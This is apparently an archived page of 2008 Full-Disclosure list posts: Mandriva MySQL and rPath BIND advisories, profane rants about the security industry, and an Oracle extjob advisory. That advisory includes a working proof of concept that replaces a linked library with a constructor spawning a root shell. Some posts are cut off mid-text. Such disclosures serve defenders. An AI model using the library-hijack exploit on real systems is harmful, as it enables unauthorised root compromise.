[Full-disclosure] [ MDVSA-2008:150 ] - Updated mysql packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:150 http://www.mandriva.com/security/ ___ Package : mysql Date: July 19, 2008 Affected: 2007.1, 2008.0, Corporate 4.0 ___ Problem Description: Multiple buffer overflows in yaSSL, which is used in MySQL, allowed remote attackers to execute arbitrary code (CVE-2008-0226) or cause a denial of service via a special Hello packet (CVE-2008-0227). Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths given in a CREATE TABLE statement; as well it would not, under certain conditions, prevent two databases from using the same paths for data or index files. This could allow an authenticated user with appropriate privilege to create tables in one database to read and manipulate data in tables later created in other databases, regardless of GRANT privileges (CVE-2008-2079). The updated packages have been patched to correct these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 ___ Updated Packages: Mandriva Linux 2007.1: 56e59e5a7413ca900767afa20480fff5 2007.1/i586/libmysql15-5.0.45-8.2mdv2007.1.i586.rpm c11348f9b60a3fb153cf07a7b2e22502 2007.1/i586/libmysql-devel-5.0.45-8.2mdv2007.1.i586.rpm a60fca42161427ed528a6a1fd58c61e3 2007.1/i586/libmysql-static-devel-5.0.45-8.2mdv2007.1.i586.rpm a6c4108497edb6cd0d7f723ca5f81c1f 2007.1/i586/mysql-5.0.45-8.2mdv2007.1.i586.rpm 62b091bfed614ed2be0e9f1dabc00e6e 2007.1/i586/mysql-bench-5.0.45-8.2mdv2007.1.i586.rpm 65c4cbcbaa11ad0fd5521ff9821a0e71 2007.1/i586/mysql-client-5.0.45-8.2mdv2007.1.i586.rpm 6cafb4fc0190c3d8c301737cc1b2d584 2007.1/i586/mysql-common-5.0.45-8.2mdv2007.1.i586.rpm ab7ff6bc5ed1e3add97e87eadffdf7d0 2007.1/i586/mysql-max-5.0.45-8.2mdv2007.1.i586.rpm 0c0d3817061fed8a9495b976e9aad4f6 2007.1/i586/mysql-ndb-extra-5.0.45-8.2mdv2007.1.i586.rpm e180f9184b397c76f121fa2cbcc249ee 2007.1/i586/mysql-ndb-management-5.0.45-8.2mdv2007.1.i586.rpm 11f6b6b340ec050489117a31ba1ada7b 2007.1/i586/mysql-ndb-storage-5.0.45-8.2mdv2007.1.i586.rpm 27d5c830d808a9198b5a3234ab635c31 2007.1/i586/mysql-ndb-tools-5.0.45-8.2mdv2007.1.i586.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: 861ae8a12d105c0537345f4b1b6364a6 2007.1/x86_64/lib64mysql15-5.0.45-8.2mdv2007.1.x86_64.rpm 74995c774432f4acacf682d14b738bae 2007.1/x86_64/lib64mysql-devel-5.0.45-8.2mdv2007.1.x86_64.rpm 5453d884b0edf40606bd78e62aef8101 2007.1/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2007.1.x86_64.rpm ef7ab96c6a492dad1a5f1463eaf5568b 2007.1/x86_64/mysql-5.0.45-8.2mdv2007.1.x86_64.rpm e6527ea8482a7928095a2d1d24953ad6 2007.1/x86_64/mysql-bench-5.0.45-8.2mdv2007.1.x86_64.rpm 896ed2418af55577669d67b2b110fded 2007.1/x86_64/mysql-client-5.0.45-8.2mdv2007.1.x86_64.rpm 9cfc765f29d39220862dd8b38a7baddb 2007.1/x86_64/mysql-common-5.0.45-8.2mdv2007.1.x86_64.rpm f738941dbf2fb982e5f91ad1f5b8dd99 2007.1/x86_64/mysql-max-5.0.45-8.2mdv2007.1.x86_64.rpm 604b3cdacc031819c1a76f64974e 2007.1/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2007.1.x86_64.rpm 944f87e17f3a30a41392b57005b3866d 2007.1/x86_64/mysql-ndb-management-5.0.45-8.2mdv2007.1.x86_64.rpm abe714a023e8019dc2379f38a10287c6 2007.1/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2007.1.x86_64.rpm 60585f5c00ea687c710da9bf8dc620b0 2007.1/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2007.1.x86_64.rpm 0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm Mandriva Linux 2008.0: 32915a44b313f9752d53864929acacef 2008.0/i586/libmysql15-5.0.45-8.2mdv2008.0.i586.rpm 886f68f93c90d168f0f376f2bdf19dfe 2008.0/i586/libmysql-devel-5.0.45-8.2mdv2008.0.i586.rpm 05d52109e0e751d6ecb330361f0c49b1 2008.0/i586/libmysql-static-devel-5.0.45-8.2mdv2008.0.i586.rpm c2d269602985c48dbfaa56edbb2089a5 2008.0/i586/mysql-5.0.45-8.2mdv2008.0.i586.rpm fe5a49a0dbcf5b5b862fa15c697ec734 2008.0/i586/mysql-bench-5.0.45-8.2mdv2008.0.i586.rpm 5d9e574e07b13db1e98ac5084ef24c52 2008.0/i586/mysql-client-5.0.45-8.2mdv2008.0.i586.rpm c3a73f6ba9467995e4eeeb2994987e8c 2008.0/i586/mysql-common-5.0.45-8.2mdv2008.0.i586.rpm faca35a011bd9e95c3aded56c498efe7 2008.0/i586/mysql-max-5.0.45-8.2mdv2008.0.i586.rpm ae5bece63ecfacd37582c68288e146a6 2008.0/i586/mysql-ndb-extra-5.0.45-8.2mdv2008.0.i586.rpm 6948d8799ff1e8e9ae3908dcfdfafc2a 2008.0/i586/mysql-ndb-management-5.0.45-8.2md
Re: [Full-disclosure] Torvalds attacks IT industry 'security circus'
On Sat, Jul 19, 2008 at 7:34 PM, php0t <[EMAIL PROTECTED]> wrote: > > If I didn't feel you were moving towards being-serious-about-it, i'd give > you a cookie for writing up so many useless, senseless, and obviously > provocative thoughts about a subject where you lack even the slightest > competence. > > P. > Blame Torvalds and Cnet News if you want to talk about provocative, they are the ones that made me do the rant, if it wasn't for them I would have no fuel for my rant im passionate about. So if you want to know who is provocative its Torvalds and Cnet News. Ever since Robert Lemos published a story about me i've been against media outlets talking about mailing list comments, its wrong. Nobody wants their mailing list comments quoted in the media and I wish Securityfocus and Cnet News would stop it. A few drunken rants of mine were taken and put into a PDF file and written in a Securityfocus news article by Robert Lemos, and you know the government or whoever might of thought it was true because it was written by people who thought they knew what they were talking about. The truth is, three people was n3td3v? No it was probably just me in three states of sober, drunk and hungover if the Neal Krawetz thing is anything to be taken seriously. And the n3td3v is a hacker group who targets Yahoo, Microsoft and Google... that was another drunken rant comment by me that was whipped up by Robert Lemos and Neal Krawetz to put in the media circus to sell more ad clicks. The truth is Torvalds was probably drunk as well when he wrote those comments, so why don't the media stop quoting people on mailing lists, without at least emailing the author in private to ask if it was the users actual opinion of just simply a drunken slur rant like many of the n3td3v emails are. I wish the media would just stop using mailing list drama as a way to make money. Stop quoting people on the mailing lists without permission of the author and certainly don't write a PDF about n3td3v without my side of the story getting any input. The media circus, the Cnet News story about Torvalds is exactly what he's talking about, but him speaking out against the security industry is a good thing. I'm sick of being the only one ranting about it and that a big player has come out to call out the industry when its needed. We need more drunk people on the mailing lists... its the way ahead. As long as the media don't quote people without asking first and that Neal Krawetz and Robert Lemos should say sorry for being morons. FYI: n3td3v is no hacker group... im just a fag with a google group, members of the public joined... once upon a time I was delusional, got drunk and thought I was a hacker with a hacker group, in reality im just a piss head alcoholic with no job or career. Those times are gone, im older now and looking to the future... maybe a job in the government as a toilet attendant, let's see. All the best, n3td3v > > - Original Message - From: "n3td3v" <[EMAIL PROTECTED]> > To: > Sent: Saturday, July 19, 2008 8:27 PM > Subject: [Full-disclosure] Torvalds attacks IT industry 'security circus' > > >> The maker of Linux was right, >> >> "In an e-mail to the Linux kernel developer mailing list, Torvalds >> said a section of the security industry was dedicated to finding bugs >> in software only to publicize their findings and gain notoriety." >> >> >> http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html >> >> We've got to stop doing an HD Moore to make a name for ourselves and >> release vulnerabilities for the right reason, not to become a cyber >> security rock star!!! >> >> The security industry is a circus, its a joke what its turned into, >> its not about security anymore its a media circus, with over hype and >> over drive. >> >> Let's cut away with the elitism and become normal people again who >> aren't pumped up on steroids everyday to become famous. >> >> The media are to blame, the Robert Lemos's and the others, they write >> shit all the time just to make their companies ad click money, they >> don't really care what's written as long as its security related they >> don't care. >> >> As little research as possible and the most amount of over steer to >> make the security industry sound more important and exciting than it >> is. >> >> Security, its a dull field to be in, once you know it all you really >> do know it all. Its a boring sport being a security professional. >> >> That's why when some new disclosure comes along, we make a big deal of >> it, to give us some excitement in your boring life. >> >> This security industry is driven by the media to give it free >> advertising and to drive up profits... the care about security takes >> second shelf... the ad click and egoism comes first. >> >> Go look at the web based archives of the less-busy mailing lists on >> Securityfocus, its a rat run of security conference spam when the >> subject is supposed to be on security,
[Full-disclosure] [ MDVSA-2008:149 ] - Updated mysql packages fix vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2008:149 http://www.mandriva.com/security/ ___ Package : mysql Date: July 19, 2008 Affected: 2008.1 ___ Problem Description: Sergei Golubchik found that MySQL did not properly validate optional data or index directory paths given in a CREATE TABLE statement; as well it would not, under certain conditions, prevent two databases from using the same paths for data or index files. This could allow an authenticated user with appropriate privilege to create tables in one database to read and manipulate data in tables later created in other databases, regardless of GRANT privileges (CVE-2008-2079). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079 ___ Updated Packages: Mandriva Linux 2008.1: 6782fa8e80d657cc32a784791296136c 2008.1/i586/libmysql15-5.0.51a-8.1mdv2008.1.i586.rpm d38cfb788ab390a22e50c4d8cd88f713 2008.1/i586/libmysql-devel-5.0.51a-8.1mdv2008.1.i586.rpm 17c5413087a43818eb37625415db339c 2008.1/i586/libmysql-static-devel-5.0.51a-8.1mdv2008.1.i586.rpm 725b41649fd161c63087f0e44ec488bb 2008.1/i586/mysql-5.0.51a-8.1mdv2008.1.i586.rpm c6864405d42406bf85f8e2fb08af8793 2008.1/i586/mysql-bench-5.0.51a-8.1mdv2008.1.i586.rpm e6df015114747e50092b6a9d7225e821 2008.1/i586/mysql-client-5.0.51a-8.1mdv2008.1.i586.rpm 5b359172c307e980b7c8d3e409f1f85a 2008.1/i586/mysql-common-5.0.51a-8.1mdv2008.1.i586.rpm b65eb90008f0f329fcd78aa601c941cf 2008.1/i586/mysql-doc-5.0.51a-8.1mdv2008.1.i586.rpm 803c2840d6e56e851d043c21c8d153ba 2008.1/i586/mysql-max-5.0.51a-8.1mdv2008.1.i586.rpm ce4f47ad3c03549aee94d5b88734f6c8 2008.1/i586/mysql-ndb-extra-5.0.51a-8.1mdv2008.1.i586.rpm 3f4013ca6f91d85d00895d58fccb235a 2008.1/i586/mysql-ndb-management-5.0.51a-8.1mdv2008.1.i586.rpm 494932ed64f2813cf0896f23112debc3 2008.1/i586/mysql-ndb-storage-5.0.51a-8.1mdv2008.1.i586.rpm d7c24b1ccf013e14adc943fe90fc11c5 2008.1/i586/mysql-ndb-tools-5.0.51a-8.1mdv2008.1.i586.rpm 0e68ede1df17ebd9dfa4c02ca7205dc1 2008.1/SRPMS/mysql-5.0.51a-8.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 7efe5a4aaf106e5f28118d4f0a6757e5 2008.1/x86_64/lib64mysql15-5.0.51a-8.1mdv2008.1.x86_64.rpm 0793a32b20f398f03580aaa5377e5192 2008.1/x86_64/lib64mysql-devel-5.0.51a-8.1mdv2008.1.x86_64.rpm c3efcca1e7b13bf2d38cc15ac34c3a05 2008.1/x86_64/lib64mysql-static-devel-5.0.51a-8.1mdv2008.1.x86_64.rpm aa1408995eec88602fe6cde92b662814 2008.1/x86_64/mysql-5.0.51a-8.1mdv2008.1.x86_64.rpm ac232e2c080dccf9745f18a901079b7d 2008.1/x86_64/mysql-bench-5.0.51a-8.1mdv2008.1.x86_64.rpm af82fcb4a9c02aa0994015892a0d1297 2008.1/x86_64/mysql-client-5.0.51a-8.1mdv2008.1.x86_64.rpm 7628f598b3d767f0f37f30b80f224db8 2008.1/x86_64/mysql-common-5.0.51a-8.1mdv2008.1.x86_64.rpm ae212a73fda5f0e334d71a0fca4cd8b5 2008.1/x86_64/mysql-doc-5.0.51a-8.1mdv2008.1.x86_64.rpm 734b94f12d8c8b9042780e03d0a2c7df 2008.1/x86_64/mysql-max-5.0.51a-8.1mdv2008.1.x86_64.rpm 53a4ab72777ab8c85a89f8f37ceaecff 2008.1/x86_64/mysql-ndb-extra-5.0.51a-8.1mdv2008.1.x86_64.rpm 8f57766a240e25ae39c11ffba53f5762 2008.1/x86_64/mysql-ndb-management-5.0.51a-8.1mdv2008.1.x86_64.rpm 3e0df3dabd48d33ccfe4322bffe36743 2008.1/x86_64/mysql-ndb-storage-5.0.51a-8.1mdv2008.1.x86_64.rpm 02030eb47df043478edc5886d9706849 2008.1/x86_64/mysql-ndb-tools-5.0.51a-8.1mdv2008.1.x86_64.rpm 0e68ede1df17ebd9dfa4c02ca7205dc1 2008.1/SRPMS/mysql-5.0.51a-8.1mdv2008.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFIghjzmqjQ0CJFipgRAg2lAKCPKI1bYFVEu+WtzrBRzIERRkuzvwCfeakB uT2vsaASgbZ7/Mfe3zNpGmo= =aIyr -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://
[Full-disclosure] Torvalds attacks IT industry 'security circus'
The maker of Linux was right, "In an e-mail to the Linux kernel developer mailing list, Torvalds said a section of the security industry was dedicated to finding bugs in software only to publicize their findings and gain notoriety." http://news.cnet.com/Torvalds-attacks-IT-industry-security-circus/2100-1007_3-6243900.html We've got to stop doing an HD Moore to make a name for ourselves and release vulnerabilities for the right reason, not to become a cyber security rock star!!! The security industry is a circus, its a joke what its turned into, its not about security anymore its a media circus, with over hype and over drive. Let's cut away with the elitism and become normal people again who aren't pumped up on steroids everyday to become famous. The media are to blame, the Robert Lemos's and the others, they write shit all the time just to make their companies ad click money, they don't really care what's written as long as its security related they don't care. As little research as possible and the most amount of over steer to make the security industry sound more important and exciting than it is. Security, its a dull field to be in, once you know it all you really do know it all. Its a boring sport being a security professional. That's why when some new disclosure comes along, we make a big deal of it, to give us some excitement in your boring life. This security industry is driven by the media to give it free advertising and to drive up profits... the care about security takes second shelf... the ad click and egoism comes first. Go look at the web based archives of the less-busy mailing lists on Securityfocus, its a rat run of security conference spam when the subject is supposed to be on security, thats what we've turned into, a shaft of advertising meccaIn security we get to advertise for free, in security we don't need to buy banner ads. In security we can charge thousands of pounds a ticket to watch a nerd mumble in a voice which only reflects the persons social isolation from the world and the true life style of the geek, a sad lonley pisser, sitting in his own urine and coding up exploit code to give his sad existence more self worth. Fresh air doesn't exist in nerd land, only the recycled air of our own farts and bad breath, at weekends we don't wash, and on Monday your co-workers notice part of your beard you forgot to shave, and you are wearing the same clothes you did last week and everyweek. Do I sound bitter, its because I probably am. We need a shake a good long shake, take hold of yourselves and see what you've turned into, is this what we want to be a hyped up media circus of wombats? The security conference spam runs... let's outlaw that shit. Month of browser bugs and Metasploit framework... let's trash that. Dan Kaminsky... the man who changed internet security...Cnet staff, let's scrap headlines like that. The Pwnie awards & not letting Dan Kaminsky be nominated for most over hyped bug, let's add him and every mother fucker in the industry as a nomination, we're all over hyped and i'm sick of it. And for next years Pwnie awards, let's add a category for most illegally spammed security conference and most over hyped security conference, because they all are. Buy your banner ads and get yourself off the mailing lists now and forever in the future. Stop advertising your security conferences through security researchers and asking them to post the vulnerability a month before the damn conference, we're not stupid we see through you. Yes, you the leaders of the security conferences and the industry, the ones using security researchers to make a lot of cash and make you dirty rich so you can sit on a yacht for the rest of the year with chicks by your side drinking champagne. The leaders of the industry are exploiting the media and the security researchers, they're in it for the money to tool up revenue, they couldn't care less about us and cyber security... they just want to become filthy rich. Its people like you who are screwing it up for the future generation, there won't be a security underground left in 10 years time, because the industry will have it grave yarded and scared the underground away from existence. People are scared the law will change, the government can show you the industry money makers whose really in charge, we can make certain things illegal for security researchers to do, and tighten up on how much money you can make and exploit security researchers for. In the sex trade there is human trafficking, in the security industry there is the exploitation & trafficking of security researchers. So what is the security industry making you researchers? A whore to the cause of making money and not really caring about you or actual security. I've got one thing to say to security researchers... stop being exploited by these people and go independent, don't goto a security conference, stand out in a market square in the middle of a town, and invite an
[Full-disclosure] rPSA-2008-0231-1 bind bind-utils
rPath Security Advisory: 2008-0231-1 Published: 2008-07-19 Products: rPath Linux 2 Rating: Major Exposure Level Classification: Remote System User Deterministic Weakness Updated Versions: [EMAIL PROTECTED]:2/9.4.2_P1-2-0.1 [EMAIL PROTECTED]:2/9.4.2_P1-2-0.1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2378 https://issues.rpath.com/browse/RPL-2563 https://issues.rpath.com/browse/RPL-2657 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 Description: Previous versions of the bind package are vulnerable to a cache-poisoning attack due to a weakness in the DNS protocol. This update improves bind's resilience to this attack; however, it does not provide a definitive solution. Additionally, the bind package has been updated with root nameserver information, including the new IP address for the "L" root nameserver. http://wiki.rpath.com/Advisories:rPSA-2008-0231 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle Database Local Untrusted Library Path Vulnerability
Oracle Database Local Untrusted Library Path Vulnerability
--
The Oracle July 2008 Critical Patch Update fixes a vulnerability which
allows a user in the OINSTALL/DBA group to scalate privileges to root.
Scalating Privileges from "oracle" to "root"
In Oracle 10g R2 and later (Oracle11g is also vulnerable) the affected
binary, $ORACLE_HOME/bin/extjob, is SUID root and must be suid root. In
the following forum from Oracle you will found a note at the bottom of
the page:
(...)
In 10.2.0.2 and higher
rdbms/admin/externaljob.ora file must must be owned by root:oraclegroup
and
be writable only by the owner i.e. 644 (rw-r--r--)
bin/extjob file must be also owned by root:oraclegroup but must be
setuid i.e. 4750 (-rwsr-x---)
bin/extjobo should have normal 755 (rwxr-xr-x) permissions and be owned
by
oracle:oraclegroup
In 11g and higher
Same as 10.2.0.2 but additionally bin/jssu should exist with root
setuid
permissions i.e. owned by root:oraclegroup with 4750 (-rwsr-x---)
(...)
The "oraclegroup" is commonly "dba" or "oinstall". Regardless of the
group's name, if a user can execute OS commands from the database (after
an attacker gains DBA privileges by abusing from an sql injection
vulnerability, in example) the user is allowed to execute, modify,
delete or create new files under the ORACLE_HOME directory.
The following are the linked libraries of the extjob binary:
$ ldd $ORACLE_HOME/bin/extjob
linux-gate.so.1 => (0xe000)
libclntsh.so.10.1
=> /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.1
(0xb669d000)
libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb6681000)
libm.so.6 => /lib/tls/i686/cmov/libm.so.6 (0xb665f000)
libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0
(0xb664d000)
libnsl.so.1 => /lib/tls/i686/cmov/libnsl.so.1 (0xb6638000)
libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb6509000)
libnnz10.so
=> /home/joxean/oracle10g/product/10.1.0/db_2/lib/libnnz10.so
(0xb635f000)
libaio.so.1 => /usr/lib/libaio.so.1 (0xb635c000)
/lib/ld-linux.so.2 (0xb7f95000)
As you can see, 2 Oracle libraries are linked to the extjob binary. A
user in the oracle group can't change the binary "extjob" because it's
owned by root but can change linked libraries to execute arbitrary code
under the privileges of "root". The following is an example of what can
be done:
-- Example with libclntsh.so
$ cat test.c
#include
#include
#include
void __attribute__ ((constructor)) my_init(void)
{
printf("[+] It works! Root shell...\n");
system("/bin/sh");
}
$ cc test.c -fPIC -o test.so -shared
$
mv /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
/home/joxean/oracle10g/product/10.2.0/db_2/lib/.libclntsh.so.10.2
$ mv
test.so /home/joxean/oracle10g/product/10.2.0/db_2/lib/libclntsh.so.10.2
$ $ORACLE_HOME/bin/extjob
[+] It works! Root shell...
sh-3.1#
Notes
-
Despite the privileges needed, the vulnerability can be used in a
multi-stage attack to gain root privileges.
Workaround
--
Remove the SUID root bit from the extjob binary.
Disclaimer
--
The information in this advisory and any of its demonstrations is
provided "as is" without any warranty of any kind.
I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory.
Contact
---
Joxean Koret - joxeankoret[at]yahoo[dot]es
References
--
http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=727
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-2613
signature.asc
Description: This is a digitally signed message part
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AFK from full-disclosure
I am reachable 0nly @ two addresses from now on: http://www.milw0rm.com http://www.com-winner.com Thanks n3td3v ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
